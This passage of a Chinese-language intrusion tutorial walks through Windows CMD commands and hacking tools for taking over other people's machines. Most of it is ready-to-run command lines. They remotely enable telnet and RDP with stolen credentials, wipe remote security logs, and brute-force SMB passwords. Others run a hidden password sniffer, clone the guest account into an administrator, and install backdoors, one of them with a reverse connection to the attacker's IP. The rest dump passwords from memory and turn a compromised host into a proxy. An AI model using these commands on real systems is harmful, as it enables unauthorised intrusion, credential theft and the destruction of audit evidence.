需要+端口即:telnet ip 就好)
11、傳輸文件命令_ftp
其實這個我個人覺得用途不大,畢竟當你拿到了FTP密碼之後你可以用flashftp或者cutftp有一個圖形截面的交互如何不好呢?
首先在CMD裡面輸入ftp
然後輸入:open ip port
例如:open 192.168.1.1 123 \\連接登陸192.168.1.1的123端口
如何開啟windows系統自帶的ftp服務:
net start msftppsvc
12、 查看文件夾的屬性_cacls
Cacls ylinuxs \\查看ylinuxs這個文件夾的屬性
參數說明:F:(完全控制)R:(只讀)C:(允許更改)W:(允許寫入)N:(沒有任何權限)
13、刪除文件_del
del是用來刪除文件命令
首先進入你想刪除的文件的目錄
del ylinuxs.txt \\刪除ylinuxs.txt這個個文件
del ylinuxs.txt /f \\強制刪除ylinuxs.txt這個個文件(當該文件無{MOD}常刪除的時候使用該命令)
14、 finger命令
Finger是一個信息刺探命令一般在對方開啟了79端口時命令使用
Finger –l user @computer
參數詳解: -l 用長列表格式顯示消息
User:指定用戶的信息
成功實現的條件:對方必須安裝tcp/ip協議
15、文件寫入命令_echo:
Echo hello > index.htm \\用hello來覆蓋index.htm的內容
Echo hello >>index.htm \\將hello添加到index.htm
16、寫入注冊表文件_regedit
Regedit /s filename.reg \\s是寫入參數
17、端口映射_chgport
Chgport 3=5 \\將端口3映射到5
Chgport /d* \\刪除所有端口映射
18、文件映射_subst
subst b: c:\windows \\這個時候當你訪問硬盤b的時候你就是訪問了 c:\windows目錄了,不過這樣是非常危險的
subst b: /D \\刪除映射的盤b
19、查看當前正在使用的帳號:
query session \\查看帳號
20、踢掉指定用:
Logoff id \\注意ID,是在用query session查看到的用戶的id而不是用戶名。
21發送消息給某用戶或者內網主機
net send hostname or /ip message
例如:net send ylinuxs or /192.168.1.1 hello! \\給主機名為ylinuxs或是ip為192.168.1.1發送消息為hello!
CMD的內部基本入侵命令講解完畢,現在我們來講講他的外部命令,也就是借用外部DOS小工具的方法:
(二)CMD外部一部分小工具的使用方法:
1、opentelnet:一個在得到對方用戶名與密碼的情況下遠程開啟對方telnet的程序
命令語法:opentelnet \\ip username pass ntml port
例 子:opentelnet \\192.168.1.1 administrator 123456 1 3800
開啟主機192.168.1.1的telnet服務,並且端口設置在3800(當連接的時候就需要telnet 192.168.1.1 3800了)1是NTML的驗證值,就是說,我們需要
輸入登陸用戶名與密碼才能登陸。
該命令成功實現的條件:對方沒有裝防火牆,並且ipC$服務開啟
telnet.vbe:一個不基於ipC$是否開啟直接開telnet的工具
命令語法:cscript telnet.vbe 192.168.1.1 username pass ntml port
這個與上面哪個opentelnet的使用含義是一樣的
該命令成功實現的條件:對方沒有裝防火牆
2、Pslist:查看系統進程的工具或是windows內部自帶的tasklist命令
Pskill:殺除系統進程的工具或是windows內部自帶的taskkill命令
進入工具目錄直接輸入:pslist即可以查看系統進程如下圖:
殺死或叫結束進程
Pskill pid 進程號
taskkill /PID 進程號 \\若結束不了,可加上/F強行結束
3、fport:一個查看系統程序所對應的端口的工具或windows自帶的netstat 或加上-an參數
4、遠程刪除日志:
Cleanlog.vbe
命令語法:
Cscript cleanlog.vbe ip username pass system –all \\刪除系統日志
Cscript cleanlog.vbe ip username pass application –all \\刪除應用程序日志
Cscript cleanlog.vbe ip username pass secutity –all \\刪除安全日志
使用的優勢:無須對方開啟ipc$共享
5、遠程開啟關閉重啟主機:
Reboot.vbe
Cscript Reboot.vbe ip username pass –r \\重啟目標主機
Cscript Reboot.vbe ip username pass –s \\關閉目標主機
Cscript Reboot.vbe ip username pass –I \\注銷目標當前用戶
Cscript Reboot.vbe ip username pass –p \\關閉目標電源
使用的優勢:無須對方開啟ipc$共享
6、端口重定rinetd and fpipe
首先說說rinetd的使用
首先我們配置一個文件ylinuxs.txt這樣配置一般都很簡單,一般下載下來的軟件裡面都有說明的,只須按照它所說的步驟一步步來就可以了。
ylinuxs.txt內容如下:
ip1 21 ip2 3389 //釋:ip1是主機ip ip2是要接受的內網主機ip,既整個命令的意思是當你連接ip1主機(公網ip)的21端口的時候,主機一(ip1
)會把他21端口接收到數據發到內網主機(ip2)的3389。也就是你連接ip1主機的21端口,實際上就是連接ip2的3389端口。
命令:rinetd.exe –c ylinuxs.txt
工具2:fpipe
使用命令:fpipe –v –l 53 s 53 –r 23 主機ip
例子:fpipe –l 80 –s 90 –r 80 127.0.0.1
釋:將本機的80端口接收到的數據通過本機的90端口直接轉發到127.0.0.1的80端口
7、SNMP弱口令的利用:
工具:Snmputil
Snmputil [get|getnext|walk]agent id \\語法格式
Snmputil walk 192.168.1.1 ylinuxs.1.3.6.1.4.1.77.1.2.25.1.5 \\查詢帳戶
Snmputil walk 對方ip public.1.3.6.1.2.1.25.4.2.1.2 \\查詢系統進程
Snmputil walk 對方ip public.1.3.6.1.4.1.77.1.2.25.1.1 \\查詢用戶列表
Snmputil walk 對方ip public .1.3.6.1.2.1.1 \\列出對方系統信息
該工具的作用:查詢一部分系統而已
我個人這個沒有很大的作用,查看到了系統信息,要攻破還是需要運氣
8、暴力破解系統密碼
Smbcrack
Smbcrack ip username 字典路徑 端口
說明:首先你需要用字典自己做一個字典,用戶名建議是administrator 因為這個是系統默認的管理員估計大多數人的主機這個帳號還是存在的,端
口可以是139、137、445等系統開啟的netBOIS協議端口就可以!
9、小巧的嗅歎器_xsniff(若有需要還可以用sniffer,對於sniffer全是英文的,沒有一個月,一般人拿來用處不大,若你精通了,那可就厲害了,若想
下載或是想學習去http://hi.baidu.com/ylinuxs/blog/item/2202cb408ef79c1c9313c634.html,上面有說明文件.)
Xsniff是一個小巧的嗅歎器,可以嗅歎UDP/TCP協議的信息
使用語法:
Xsniff –pass –hide –log c:\pass.log –pass
c:\pass.log 是保存記錄文件,建議選擇一個深的目錄,可以自定義
性能參數:
-hide 隱藏在後台運行 -log:生成嗅歎的日志文檔
Pass.log:嗅歎的日志文檔文檔名,可以自定義
-TCP:捕獲TCP數據包
-UDP:捕獲UDP數據包
-ICMP:捕獲ICMP數據包
-HOST:主機名或ip地址
-PORT:指定端口嗅歎
-ASC輸出出時保存為ASCII格式
10、SFIND 命令行掃描器
例子:
Sfind –p 3389 192.168.1.1 192.168.1.255
掃描192.168.1.1段的1-255主機的3389端口
Sfind –cgi 192.168.1.1 //掃描192.168.1.1的cgi漏洞
Sfind –ftp 192.168.1.1 //掃描192.168.1.1的ftp漏洞
Sfind –idq 192.168.1.1 //掃描192.168.1.1的idg漏洞
11、克隆帳號CA:
CA.EXE \\ip administrator “” guest 123
將GUEST帳號克隆成管理員
Administrator 的密碼為空用”” guest的密碼是123
12、後門使用:
這裡我介紹小榕的bits
說明:BITS必須放在system32目錄下才可以安裝
安裝命令:rundll32.exe BITS.dll install rasato ylinuxs \\指定後門特征為ylinuxs
連接激活:
正向連接(用nc連接即可):ylinuxs:@ip[xell]:99
反向連接:ylinuxs:@ip[rxell]:yourip:port
卸載:rundll32.exe BITS.dll uninstall
同時也介紹T-CMD
安裝命令:
t-cmd –install
然後:telnet ip 20540
就可以了,T-CMD是菜鳥的好選擇
13、系統密碼查看_showpass
直接進入showpass的目錄直接運行showpass只要當前用戶在線,那麼showpass就可以把他的密碼從內存裡找出來。
14、代理肉雞的制作_SK
安裝命令:
sk.exe –install \\安裝SK
sk.exe -config port 4999 \\設置端口為4999
sk.exe -config starttype 2 \\設置啟動項為自啟動
net start skserver \\啟動SK代理服務
15、SQL弱口令利用
我本來在這裡不想說這個,但是希望大家能夠綜合利用所以我就直接說了。(SQL的弱口令大家可以用WINDOWS 2000自動攻擊探測器掃描.)
Sqlexeca.exe ip sa 123
因為是弱口令,所以用123表示,同時也告訴大家SQL服務器的最高權限帳戶是SA,這個是不能更改的!
16、終端服務的開啟與使用
這個恐怕就是菜鳥們最喜歡的話題了一個圖形話的交互界面
工具:3389.exe 3389.vbe 3389.bat
方法一:3389.exe:只需要把此文件復制到你所要開啟的服務器運行此程序就可以了。
方法二:3389.vbe:這個是一個腳本文件,使用方法如下:
Cscript 3389.vbe ip username pass port /r //密碼必須是管理員密碼 port是終端的端口,這個是可以自己定義的,參數.r是說
明開啟成功自動重啟動服務器!你也可以使用/fr,FR的意思就是強制重新啟動服務器!
方法三:3389.bat:這個是一個BAT文件利用批處理來開3389網絡上很多相關資料大家可以參考參考,3389.bat的內容如下:
echo [components] > d:\ylinuxs
echo tsenable=on >> d:\ylinuxs
sysocmgr /i:d:\winnt\inf\sysoc.inf /u:d:\ylinuxs /q
大家可以把上述代碼保存一個bat然後放到要開3389的服務器上,在CMD下運行,服務器的3389就開啟了。
終端的連接:
這裡推薦使用2003或者XP的終端登陸器,然後系統會提示你輸入帳號與密碼,輸入以後直接登陸就可以了!